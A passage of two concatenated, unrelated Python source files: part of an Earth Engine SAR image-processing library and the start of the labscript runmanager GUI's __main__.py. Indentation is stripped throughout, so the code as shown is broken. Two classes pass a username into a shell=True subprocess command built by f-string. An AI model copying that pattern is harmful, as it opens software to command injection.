system_index = system_index.replace('/', '__') + '__CMstats'
if isinstance(band, int):
bands = image.bandNames().getInfo()
bandname = bands[band]
bands_to_store = [bandname+'_'+store_bn for store_bn in info_to_store]
image_band = image.select(bandname)
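# glcmTexture expects integer input, so scale the (assumed 0-1) band to 0-255
# and convert to Int32; the 'Int32' property tags images already converted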
if not image_band.get('Int32').getInfo():
image_band = image_band.multiply(255).toInt32().set('Int32', True)
GCM = image_band.glcmTexture()
CM_stats = GCM.select(bands_to_store).set('system:index', system_index)
nonlocal curr
curr += 1
print(f"{curr}/{m} CM_stats complete")
return CM_stats
if isinstance(image, ee.Image):
curr, m = (0, 1)
CM_stats = CM(image)
elif isinstance(image, ee.ImageCollection):
image = eeICtolist(image)
curr, m = (0, len(image))
CM_stats = [CM(img) for img in image]
elif isinstance(image, list):
curr, m = (0, len(image))
CM_stats = [CM(img) for img in image]
else:
raise TypeError("image arg is not of ee.Image, ee.ImageCollection, or list type")
return CM_stats
def get_image_minMax(self, image):
# r10.reduceRegion(ee.Reducer.minMax(), raster10.get_aoi(), crs='EPSG:3031', scale=10, maxPixels=10e12).getInfo()
"""
Returns a dictionary of the minimum and maximum of each band
Parameters:
image (ee.Image): A single image
Returns:
minmax (dict): A dictionary containing the min, max values of each band
"""
minMax = image.reduceRegion(ee.Reducer.minMax(), self.get_aoi(),
scale=image.select(0).projection().nominalScale(),
maxPixels=10e12).getInfo()
return minMax
def pypeline(self, start_date, end_date, cloud_bucket,
directory, polarization='SH',
collection='COPERNICUS/S1_GRD_FLOAT', scale=50):
"""
This pipeline is a single command that will collect one image from every
month between start_date and end_date and download the results. The
in-between work is done for the user. For more flexibility, consider manually collecting images.
Each image has these bands: cluster results, band_means
Parameters:
start_date (ee.Date, str): Start date of filtering in ISO format
end_date (ee.Date, str): End date of filtering in ISO format
Returns:
None
"""
one_per_images = self.one_per('month', collection=collection, start_date=start_date,
end_date=end_date, polarization=polarization)
normalized_images = self.normalize_band(one_per_images, band=0, band_range=[0, 500])
clustered_and_filtered = self.cluster(normalized_images)
textures = self.get_CM_stats(normalized_images, band=0)
self.download((clustered_and_filtered + textures), scale, cloud_bucket, directory)
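# Example usage (sketch): running the whole pipeline for a date range. Assumes
# ee.Initialize() has already been called; the geoJSON, bucket, and directory
# names below are hypothetical placeholders.
#   area = Area(my_geojson)
#   area.pypeline('2019-01-01', '2019-06-01', cloud_bucket='my-bucket',
#                 directory='export', polarization='SH', scale=50)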
class CustomCollection(Area):
"""
This is a subclass of the main class. Use it when importing images from \
Google Cloud Storage. Standard operations can be applied like
mapfilter and clustering.
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing the directory where the files are stored
geeusername (str): your username to store the asset in the code editor
Methods:
- get_coords()
- get_aoi()
- apply_filters()
- one_per()
- latest_img()
- append_elevation_info()
- normalize_band()
- cluster()
- mapfilter()
- disp()
- download()
- hist()
- get_stats()
- get_CM_stats()
- pypeline()
"""
def __init__(self, cloud_bucket, directory, geeusername):
bucket = client.get_bucket(cloud_bucket)
blobs = client.list_blobs(bucket)
assets = []
def all_exists(blobs, directory):
command = f'earthengine ls users/{geeusername}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
output = pop.stdout.read().decode()
for blob in blobs:
ind = str(blob).find('/')
find = ' ' + directory
if str(blob)[ind-1:ind-len(find)-1:-1] != find[::-1]:
# if directory doesn't match, continue to next iter
continue
if str(blob)[ind:str(blob).find(',', ind)].strip() == '/':
# if blob is the actual directory and not a file, continue
continue
blob_info = str(blob).split(' ')
assetname = blob_info[2][blob_info[2].find('/')+1:-1]
if assetname.endswith('.tif'):
assetname = assetname[:-4]
assets.append(assetname)
if (geeusername + '/' + assetname) not in output:
return False
return True
if all_exists(blobs, directory):
assetlist = ['users/'+geeusername+'/'+assetname for assetname in assets]
self.eelist = [ee.Image(asset) for asset in assetlist]
else:
self.eelist = multicloudtoee(cloud_bucket, directory, geeusername)
geoJSON = geoJSONer(self.eelist[0].get('system:footprint').getInfo()['coordinates'])
super().__init__(geoJSON)
unbounded = [[[-180, -90], [180, -90], [180, 90], [-180, 90], [-180, -90]]]
if self.coords == unbounded:
new = [[[-179, -85],[179, -85],[179, 85],[-179, 85],[-179, -85]]]
self.coords = new
self.aoi = ee.Geometry.Polygon(self.coords, proj='EPSG:4326',
geodesic=False, evenOdd=True, maxError=1)
def get_coords(self):
"""
Gets the coordinates defined by the geoJSON.
Parameters:
None.
Returns:
self.coords (list): The coordinates defined by the geoJSON.
"""
return self.coords
def get_aoi(self):
"""
Gets the AOI defined by the coordinates.
Parameters:
None.
Returns:
self.aoi (ee.Geometry): The AOI defined by the coordinates.
"""
return self.aoi
def latest_img(self, threshold=80):
"""
Grabs the latest image in this custom collection.
Parameters:
threshold (int): Not used by this subclass. Defaults to 80.
Returns:
latest (ee.Image): The latest image for this area
"""
img_col = self.apply_filters()
eelist = img_col.toList(img_col.size())
latest = ee.Image(eelist.get(0)).clip(self.get_aoi())
return latest
def apply_filters(self, start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat()),
earliest_first=False):
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
img_set = ee.ImageCollection(self.eelist)
sort = img_set.sort('system:time_start', opt_ascending=earliest_first)
return sort
def one_per(self, time_range, start_date=ee.Date(0),
end_date=ee.Date(date.today().isoformat())):
"""
Applies filters to create an ee.ImageCollection with one ee.Image per time_range.
Parameters:
time_range (str): day, month, or year. Specifies the approximate \
time range between photos.
start_date (ee.Date, str): Start date of filtering in ISO format
end_date (ee.Date, str): End date of filtering in ISO format
Returns:
collected_imgs (ee.ImageCollection): An image collection containing one image
per time_range, clipped to the geoJSON area with the proper filters applied
"""
def percent_missing(image):
"""
Helper function that returns the % of the image data missing in the first band.
Parameters:
image (ee.Image): The image to calculate the % missing of
Returns:
percentMissing (float): The % missing of the image data compared \
to the self.get_aoi()
"""
missing = ee.Number(image.mask().expression('1-b(0)').reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
totalArea = ee.Number(ee.Image(1).mask().reduceRegion(
ee.Reducer.sum(), self.get_aoi(), scale=100, maxPixels=10e8).get('constant'))
percent_missing = missing.divide(totalArea).getInfo()
return percent_missing
if isinstance(start_date, (str, int)):
start_date = ee.Date(start_date)
if isinstance(end_date, (str, int)):
end_date = ee.Date(end_date)
end_date_time = end_date
current_start_time = start_date
collected_imgs = []
while ee.Algorithms.If(
ee.Number.expression("x > 0", {
'x': end_date_time.difference(current_start_time, 'day')
}), 1, 0).getInfo():
(current_start_time, current_end_time) = (ee.Date(current_start_time)
.getRange(time_range).getInfo()['dates'])
img_col = self.apply_filters(start_date=current_start_time,
end_date=current_end_time, earliest_first=True)
try:
as_list = img_col.toList(img_col.size())
best = ee.Image(as_list.get(0)).clip(self.get_aoi())
pm_best = percent_missing(best)
for i in range(as_list.length().getInfo()):
latest = ee.Image(as_list.get(i)).clip(self.get_aoi())
pm_latest = percent_missing(latest)
if pm_latest < 0.01:
best = latest
pm_best = pm_latest
break
elif pm_latest < pm_best:
best = latest
pm_best = pm_latest
collected_imgs.append(best.clip(self.get_aoi()))
print('Selected an image for {}'
.format(ee.Date(current_start_time).format('YYYY-MM-dd').getInfo()))
except KeyboardInterrupt:
print('Canceled')
except:
print('There are no images in the',
time_range, "starting on",
ee.Date(current_start_time).format('YYYY-MM-dd').getInfo())
print('The best image had {:.2f}% pixels of data missing. \
Try selecting a smaller area.'.format(pm_best*100))
current_start_time = current_end_time
return ee.ImageCollection(collected_imgs)
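# Example usage (sketch): loading previously exported images back from Cloud
# Storage. The bucket, directory, and username below are hypothetical placeholders.
#   col = CustomCollection('my-bucket', 'export', 'my_gee_username')
#   latest = col.latest_img()
#   col.disp(latest, band=0)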
class CustomImage(Area):
"""
This is a subclass of the main class. Use it when importing a single image from \
Google Cloud Storage. Standard operations can be applied like \
mapfilter and segmentation.
Parameters:
cloud_bucket (str): string describing the name of the cloud bucket
directory (str): directory describing the directory where the files are stored
geeusername (str): your username to store the asset in the code editor
Methods:
- get_coords()
- get_aoi()
- get_image()
- apply_filters()
- one_per()
- latest_img()
- append_elevation_info()
- normalize_band()
- cluster()
- mapfilter()
- disp()
- download()
- hist()
- get_stats()
- get_CM_stats()
- pypeline()
"""
def __init__(self, cloud_bucket, directory, assetname, geeusername):
if assetname.endswith('.tif'):
assetname = assetname[:-4]
command = f'earthengine ls users/{geeusername}'
pop = subprocess.Popen(command, env=os.environ.copy(),
shell=True, stdout=subprocess.PIPE)
if (geeusername + '/' + assetname) not in pop.stdout.read().decode():
self.eeImage = cloudtoeecommand(cloud_bucket, directory,
assetname, geeusername)
else:
self.eeImage = ee.Image(('users/' + geeusername + '/' + assetname))
time.sleep(3)
geoJSON = geoJSONer(self.eeImage.get('system:footprint').getInfo()['coordinates'])
super().__init__(geoJSON)
def get_image(self):
return self.eeImage
def latest_img(self):
return self.get_image()
def apply_filters(self):
return ee.ImageCollection(self.get_image())
def one_per(self):
return [self.get_image(),]
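# Example usage (sketch): wrapping a single exported GeoTIFF as an ee.Image. The
# bucket, directory, asset, and username below are hypothetical placeholders.
#   img = CustomImage('my-bucket', 'export', 'my_asset.tif', 'my_gee_username')
#   stats = img.get_stats(img.get_image(), band=0)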
# yay
|
__main__.py
|
#####################################################################
# #
# __main__.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program runmanager, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import print_function
import os
import sys
import errno
import labscript_utils.excepthook
import time
import contextlib
import subprocess
import threading
import Queue
import socket
import ast
import pprint
# Evaluation of globals happens in a thread with the pylab module imported.
# Although we don't care about plotting, importing pylab makes Qt calls. We
# can't have that from a non main thread, so we'll just disable matplotlib's
# GUI integration:
import matplotlib
matplotlib.use('Agg')
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2', '3')
check_version('qtutils', '2.0.0', '3.0.0')
check_version('zprocess', '1.1.5', '3.0')
check_version('pandas', '0.13', '2')
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
import zprocess.locking
from zmq import ZMQError
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
import labscript_utils.shared_drive as shared_drive
import runmanager
from qtutils import inmain, inmain_decorator, UiLoader, inthread, DisconnectContextManager
from qtutils.outputbox import OutputBox
import qtutils.icons
# Set working directory to runmanager folder, resolving symlinks
runmanager_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runmanager_dir)
# Set a meaningful name for zprocess.locking's client id:
zprocess.locking.set_client_process_name('runmanager')
def log_if_global(g, g_list, message):
"""logs a message if the global name "g" is in "g_list"
useful if you want to print out a message inside a loop over globals,
but only for a particular global (or set of globals).
If g_list is empty, then it will use the hardcoded list below
(useful if you want to change the behaviour globally)
"""
if not isinstance(g_list, list):
g_list = [g_list]
if not g_list:
g_list = [] # add global options here
if g in g_list:
logger.info(message)
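# Example (sketch): log a message only when iterating over a particular global,
# e.g. inside a loop over all globals ('my_global' is a placeholder name):
#   log_if_global(name, ['my_global'], 'parsing %s' % name)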
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runmanager.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runmanager']
set_appusermodel(window_id, appids['runmanager'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'runmanager', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
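# Note: on Python 3.2+ this is roughly equivalent to os.makedirs(path, exist_ok=True);
# the explicit errno check keeps it compatible with Python 2.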
@contextlib.contextmanager
def nested(*contextmanagers):
if contextmanagers:
with contextmanagers[0]:
with nested(*contextmanagers[1:]):
yield
else:
yield
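# Example (sketch): enter a runtime-determined list of context managers at once
# ('cms' is a placeholder for any iterable of context managers):
#   with nested(*cms):
#       do_something()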
def scroll_treeview_to_row_if_current(treeview, item):
"""Checks to see if the item is in the row of the current item.
If it is, scrolls vertically to ensure that row is visible.
This is done by recording the horizontal scroll position,
then using QTreeView.scrollTo(), and then restoring the horizontal
position"""
horizontal_scrollbar = treeview.horizontalScrollBar()
existing_horizontal_position = horizontal_scrollbar.value()
index = item.index()
current_row = treeview.currentIndex().row()
if index.row() == current_row:
treeview.scrollTo(index)
horizontal_scrollbar.setValue(existing_horizontal_position)
class KeyPressQApplication(QtWidgets.QApplication):
"""A Qapplication that emits a signal keyPress(key) on keypresses"""
keyPress = Signal(int, QtCore.Qt.KeyboardModifiers, bool)
keyRelease = Signal(int, QtCore.Qt.KeyboardModifiers, bool)
def notify(self, object, event):
if event.type() == QtCore.QEvent.KeyPress and event.key():
self.keyPress.emit(event.key(), event.modifiers(), event.isAutoRepeat())
elif event.type() == QtCore.QEvent.KeyRelease and event.key():
self.keyRelease.emit(event.key(), event.modifiers(), event.isAutoRepeat())
return QtWidgets.QApplication.notify(self, object, event)
class FingerTabBarWidget(QtWidgets.QTabBar):
"""A TabBar with the tabs on the left and the text horizontal. Credit to
@LegoStormtroopr, https://gist.github.com/LegoStormtroopr/5075267. We will
promote the TabBar from the ui file to one of these."""
def __init__(self, parent=None, minwidth=180, minheight=30, **kwargs):
QtWidgets.QTabBar.__init__(self, parent, **kwargs)
self.minwidth = minwidth
self.minheight = minheight
self.iconPosition = kwargs.pop('iconPosition', QtWidgets.QTabWidget.West)
self._movable = None
self.tab_movable = {}
self.paint_clip = None
def setMovable(self, movable, index=None):
"""Set tabs movable on an individual basis, or set for all tabs if no
index specified"""
if index is None:
self._movable = movable
self.tab_movable = {}
QtWidgets.QTabBar.setMovable(self, movable)
else:
self.tab_movable[int(index)] = bool(movable)
def isMovable(self, index=None):
if index is None:
if self._movable is None:
self._movable = QtWidgets.QTabBar.isMovable(self)
return self._movable
return self.tab_movable.get(index, self._movable)
def indexAtPos(self, point):
for index in range(self.count()):
if self.tabRect(index).contains(point):
return index
def mousePressEvent(self, event):
index = self.indexAtPos(event.pos())
if not self.tab_movable.get(index, self.isMovable()):
QtWidgets.QTabBar.setMovable(self, False) # disable dragging until they release the mouse
return QtWidgets.QTabBar.mousePressEvent(self, event)
def mouseReleaseEvent(self, event):
if self.isMovable():
# Restore this in case it was temporarily disabled by mousePressEvent
QtWidgets.QTabBar.setMovable(self, True)
return QtWidgets.QTabBar.mouseReleaseEvent(self, event)
def tabLayoutChange(self):
total_height = 0
for index in range(self.count()):
tabRect = self.tabRect(index)
total_height += tabRect.height()
if total_height > self.parent().height():
# Don't paint over the top of the scroll buttons:
scroll_buttons_area_height = 2*max(self.style().pixelMetric(QtWidgets.QStyle.PM_TabBarScrollButtonWidth),
qapplication.globalStrut().width())
self.paint_clip = self.width(), self.parent().height() - scroll_buttons_area_height
else:
self.paint_clip = None
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
if self.paint_clip is not None:
painter.setClipRect(0, 0, *self.paint_clip)
option = QtWidgets.QStyleOptionTab()
for index in range(self.count()):
tabRect = self.tabRect(index)
self.initStyleOption(option, index)
painter.drawControl(QtWidgets.QStyle.CE_TabBarTabShape, option)
if not self.tabIcon(index).isNull():
icon = self.tabIcon(index).pixmap(self.iconSize())
alignment = QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter
tabRect.moveLeft(10)
painter.drawItemPixmap(tabRect, alignment, icon)
tabRect.moveLeft(self.iconSize().width() + 15)
else:
tabRect.moveLeft(10)
painter.drawText(tabRect, QtCore.Qt.AlignVCenter, self.tabText(index))
if self.paint_clip is not None:
x_clip, y_clip = self.paint_clip
painter.setClipping(False)
palette = self.palette()
mid_color = palette.color(QtGui.QPalette.Mid)
painter.setPen(mid_color)
painter.drawLine(0, y_clip, x_clip, y_clip)
painter.end()
def tabSizeHint(self, index):
fontmetrics = QtGui.QFontMetrics(self.font())
text_width = fontmetrics.width(self.tabText(index))
text_height = fontmetrics.height()
height = text_height + 15
height = max(self.minheight, height)
width = text_width + 15
button = self.tabButton(index, QtWidgets.QTabBar.RightSide)
if button is not None:
height = max(height, button.height() + 7)
# Same amount of space around the button horizontally as it has vertically:
width += button.width() + height - button.height()
width = max(self.minwidth, width)
return QtCore.QSize(width, height)
def setTabButton(self, index, geometry, button):
if not isinstance(button, TabToolButton):
raise TypeError('Not a TabToolButton, won\'t paint correctly. Use a TabToolButton')
result = QtWidgets.QTabBar.setTabButton(self, index, geometry, button)
button.move(*button.get_correct_position())
return result
class TabToolButton(QtWidgets.QToolButton):
def __init__(self, *args, **kwargs):
QtWidgets.QToolButton.__init__(self, *args, **kwargs)
def paintEvent(self, event):
painter = QtWidgets.QStylePainter(self)
paint_clip = self.parent().paint_clip
if paint_clip is not None:
point = QtCore.QPoint(*paint_clip)
global_point = self.parent().mapToGlobal(point)
local_point = self.mapFromGlobal(global_point)
painter.setClipRect(0, 0, local_point.x(), local_point.y())
option = QtWidgets.QStyleOptionToolButton()
self.initStyleOption(option)
painter.drawComplexControl(QtWidgets.QStyle.CC_ToolButton, option)
def get_correct_position(self):
parent = self.parent()
for index in range(parent.count()):
if parent.tabButton(index, QtWidgets.QTabBar.RightSide) is self:
break
else:
raise LookupError('Tab not found')
tabRect = parent.tabRect(index)
tab_x, tab_y, tab_width, tab_height = tabRect.x(), tabRect.y(), tabRect.width(), tabRect.height()
size = self.sizeHint()
width = size.width()
height = size.height()
padding = int((tab_height - height) / 2)
correct_x = tab_x + tab_width - width - padding
correct_y = tab_y + padding
return correct_x, correct_y
def moveEvent(self, event):
try:
correct_x, correct_y = self.get_correct_position()
except LookupError:
return # Things aren't initialised yet
if self.x() != correct_x or self.y() != correct_y:
# Move back! I shall not be moved!
self.move(correct_x, correct_y)
return QtWidgets.QToolButton.moveEvent(self, event)
class FingerTabWidget(QtWidgets.QTabWidget):
"""A QTabWidget equivalent which uses our FingerTabBarWidget"""
def __init__(self, parent, *args):
QtWidgets.QTabWidget.__init__(self, parent, *args)
self.setTabBar(FingerTabBarWidget(self))
def keyPressEvent(self, event):
if event.modifiers() & QtCore.Qt.ControlModifier:
if event.key() in (QtCore.Qt.Key_Tab, QtCore.Qt.Key_Backtab):
# We are handling ctrl-tab events at the level of the whole
# application, so ignore them here so as not to double up.
event.ignore()
return
return QtWidgets.QTabWidget.keyPressEvent(self, event)
def addTab(self, *args, **kwargs):
closeable = kwargs.pop('closable', False)
index = QtWidgets.QTabWidget.addTab(self, *args, **kwargs)
self.setTabClosable(index, closeable)
return index
def setTabClosable(self, index, closable):
right_button = self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide)
if closable:
if not right_button:
# Make one:
close_button = TabToolButton(self.parent())
close_button.setIcon(QtGui.QIcon(':/qtutils/fugue/cross'))
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, close_button)
close_button.clicked.connect(lambda: self._on_close_button_clicked(close_button))
else:
if right_button:
# Get rid of it:
self.tabBar().setTabButton(index, QtWidgets.QTabBar.RightSide, None)
def _on_close_button_clicked(self, button):
for index in range(self.tabBar().count()):
if self.tabBar().tabButton(index, QtWidgets.QTabBar.RightSide) is button:
self.tabCloseRequested.emit(index)
break
class TreeView(QtWidgets.QTreeView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTreeview that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Also has modified tab and arrow key behaviour."""
def __init__(self, *args):
QtWidgets.QTreeView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
self._ROLE_IGNORE_TABNEXT = None
self.setAutoScroll(False)
def setRoleIgnoreTabNext(self, role):
"""Tell the Treeview what model role it should look in for a boolean
saying whether to ignore the MoveNext cursor action. This will cause
cells marked as such to simply end editing when tab is pressed,
without starting editing on any other cell."""
self._ROLE_IGNORE_TABNEXT = role
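# Example (sketch): how this role is used further down in GroupTab; items whose
# data for the role is True end editing on Tab instead of moving to the next cell:
#   GLOBALS_ROLE_IGNORE_TABNEXT = QtCore.Qt.UserRole + 5
#   treeview.setRoleIgnoreTabNext(GLOBALS_ROLE_IGNORE_TABNEXT)
#   units_item.setData(True, GLOBALS_ROLE_IGNORE_TABNEXT)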
def mousePressEvent(self, event):
result = QtWidgets.QTreeView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTreeView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
def event(self, event):
if (event.type() == QtCore.QEvent.ShortcutOverride
and event.key() in [QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]):
event.accept()
item = self.model().itemFromIndex(self.currentIndex())
if item is not None and item.isEditable():
if self.state() != QtWidgets.QTreeView.EditingState:
self.edit(self.currentIndex())
else:
# Enter on non-editable items simulates a left click:
self.leftClicked.emit(self.currentIndex())
return True
else:
return QtWidgets.QTreeView.event(self, event)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Space:
item = self.model().itemFromIndex(self.currentIndex())
if not item.isEditable():
# Space on non-editable items simulates a left click:
self.leftClicked.emit(self.currentIndex())
return QtWidgets.QTreeView.keyPressEvent(self, event)
def moveCursor(self, cursor_action, keyboard_modifiers):
current_index = self.currentIndex()
current_row, current_column = current_index.row(), current_index.column()
if cursor_action == QtWidgets.QTreeView.MoveUp:
return current_index.sibling(current_row - 1, current_column)
elif cursor_action == QtWidgets.QTreeView.MoveDown:
return current_index.sibling(current_row + 1, current_column)
elif cursor_action == QtWidgets.QTreeView.MoveLeft:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QTreeView.MoveRight:
return current_index.sibling(current_row, current_column + 1)
elif cursor_action == QtWidgets.QTreeView.MovePrevious:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QTreeView.MoveNext:
item = self.model().itemFromIndex(self.currentIndex())
if (item is not None and self._ROLE_IGNORE_TABNEXT is not None
and item.data(self._ROLE_IGNORE_TABNEXT)):
# A null index means end editing and don't go anywhere:
return QtCore.QModelIndex()
return current_index.sibling(current_row, current_column + 1)
else:
return QtWidgets.QTreeView.moveCursor(self, cursor_action, keyboard_modifiers)
class AlternatingColorModel(QtGui.QStandardItemModel):
def __init__(self, treeview):
QtGui.QStandardItemModel.__init__(self)
# How much darker in each channel is the alternate base color compared
# to the base color?
palette = treeview.palette()
normal_color = palette.color(QtGui.QPalette.Base)
alternate_color = palette.color(QtGui.QPalette.AlternateBase)
r, g, b, a = normal_color.getRgb()
alt_r, alt_g, alt_b, alt_a = alternate_color.getRgb()
self.delta_r = alt_r - r
self.delta_g = alt_g - g
self.delta_b = alt_b - b
self.delta_a = alt_a - a
# A cache, store brushes so we don't have to recalculate them. Is faster.
self.alternate_brushes = {}
def data(self, index, role):
"""When background color data is being requested, returns modified
colours for every second row, according to the palette of the treeview.
This has the effect of making the alternate colours visible even when
custom colors have been set - the same shading will be applied to the
custom colours. Only really looks sensible when the normal and
alternate colors are similar."""
if role == QtCore.Qt.BackgroundRole and index.row() % 2:
normal_brush = QtGui.QStandardItemModel.data(self, index, QtCore.Qt.BackgroundRole)
if normal_brush is not None:
normal_color = normal_brush.color()
try:
return self.alternate_brushes[normal_color.rgb()]
except KeyError:
r, g, b, a = normal_color.getRgb()
alt_r = min(max(r + self.delta_r, 0), 255)
alt_g = min(max(g + self.delta_g, 0), 255)
alt_b = min(max(b + self.delta_b, 0), 255)
alt_a = min(max(a + self.delta_a, 0), 255)
alternate_color = QtGui.QColor(alt_r, alt_g, alt_b, alt_a)
alternate_brush = QtGui.QBrush(alternate_color)
self.alternate_brushes[normal_color.rgb()] = alternate_brush
return alternate_brush
return QtGui.QStandardItemModel.data(self, index, role)
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a fixed height and faint grey vertical lines
between columns"""
EXTRA_ROW_HEIGHT = 7
def __init__(self, treeview, *args, **kwargs):
QtWidgets.QStyledItemDelegate.__init__(self, *args, **kwargs)
self._pen = QtGui.QPen()
self._pen.setWidth(1)
self._pen.setColor(QtGui.QColor.fromRgb(128, 128, 128, 64))
fontmetrics = QtGui.QFontMetrics(treeview.font())
text_height = fontmetrics.height()
self.height = text_height + self.EXTRA_ROW_HEIGHT
def sizeHint(self, *args):
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
return QtCore.QSize(size.width(), self.height)
def paint(self, painter, option, index):
QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
if index.column() > 0:
painter.setPen(self._pen)
painter.drawLine(option.rect.topLeft(), option.rect.bottomLeft())
class GroupTab(object):
GLOBALS_COL_DELETE = 0
GLOBALS_COL_NAME = 1
GLOBALS_COL_VALUE = 2
GLOBALS_COL_UNITS = 3
GLOBALS_COL_EXPANSION = 4
GLOBALS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GLOBALS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 2
GLOBALS_ROLE_PREVIOUS_TEXT = QtCore.Qt.UserRole + 3
GLOBALS_ROLE_IS_BOOL = QtCore.Qt.UserRole + 4
GLOBALS_ROLE_IGNORE_TABNEXT = QtCore.Qt.UserRole + 5
COLOR_ERROR = '#FF9999' # light red
COLOR_OK = '#AAFFCC' # light green
COLOR_BOOL_ON = '#66FF33' # bright green
COLOR_BOOL_OFF = '#608060' # dark green
COLOR_NAME = '#EFEFEF' # light grey
GLOBALS_DUMMY_ROW_TEXT = '<Click to add global>'
def __init__(self, tabWidget, globals_file, group_name):
self.tabWidget = tabWidget
loader = UiLoader()
loader.registerCustomWidget(TreeView)
self.ui = loader.load('group.ui')
# Add the ui to the parent tabWidget:
self.tabWidget.addTab(self.ui, group_name, closable=True)
self.set_file_and_group_name(globals_file, group_name)
self.globals_model = AlternatingColorModel(treeview=self.ui.treeView_globals)
self.globals_model.setHorizontalHeaderLabels(['Delete', 'Name', 'Value', 'Units', 'Expansion'])
self.globals_model.setSortRole(self.GLOBALS_ROLE_SORT_DATA)
self.item_delegate = ItemDelegate(self.ui.treeView_globals)
for col in range(self.globals_model.columnCount()):
self.ui.treeView_globals.setItemDelegateForColumn(col, self.item_delegate)
self.ui.treeView_globals.setModel(self.globals_model)
self.ui.treeView_globals.setRoleIgnoreTabNext(self.GLOBALS_ROLE_IGNORE_TABNEXT)
self.ui.treeView_globals.setSelectionMode(QtWidgets.QTreeView.ExtendedSelection)
self.ui.treeView_globals.setSortingEnabled(True)
# Make it so the user can just start typing on an item to edit:
self.ui.treeView_globals.setEditTriggers(QtWidgets.QTreeView.AnyKeyPressed |
QtWidgets.QTreeView.EditKeyPressed)
# Ensure the clickable region of the delete button doesn't extend forever:
self.ui.treeView_globals.header().setStretchLastSection(False)
# Setup stuff for a custom context menu:
self.ui.treeView_globals.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_globals_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected global(s)', self.ui)
self.action_globals_set_selected_true = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected Booleans True', self.ui)
self.action_globals_set_selected_false = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected Booleans False', self.ui)
self.connect_signals()
# Populate the model with globals from the h5 file:
self.populate_model()
# Set sensible column widths:
for col in range(self.globals_model.columnCount()):
self.ui.treeView_globals.resizeColumnToContents(col)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_NAME) < 200:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_NAME, 200)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_VALUE) < 200:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_VALUE, 200)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_UNITS) < 100:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_UNITS, 100)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_EXPANSION) < 100:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_EXPANSION, 100)
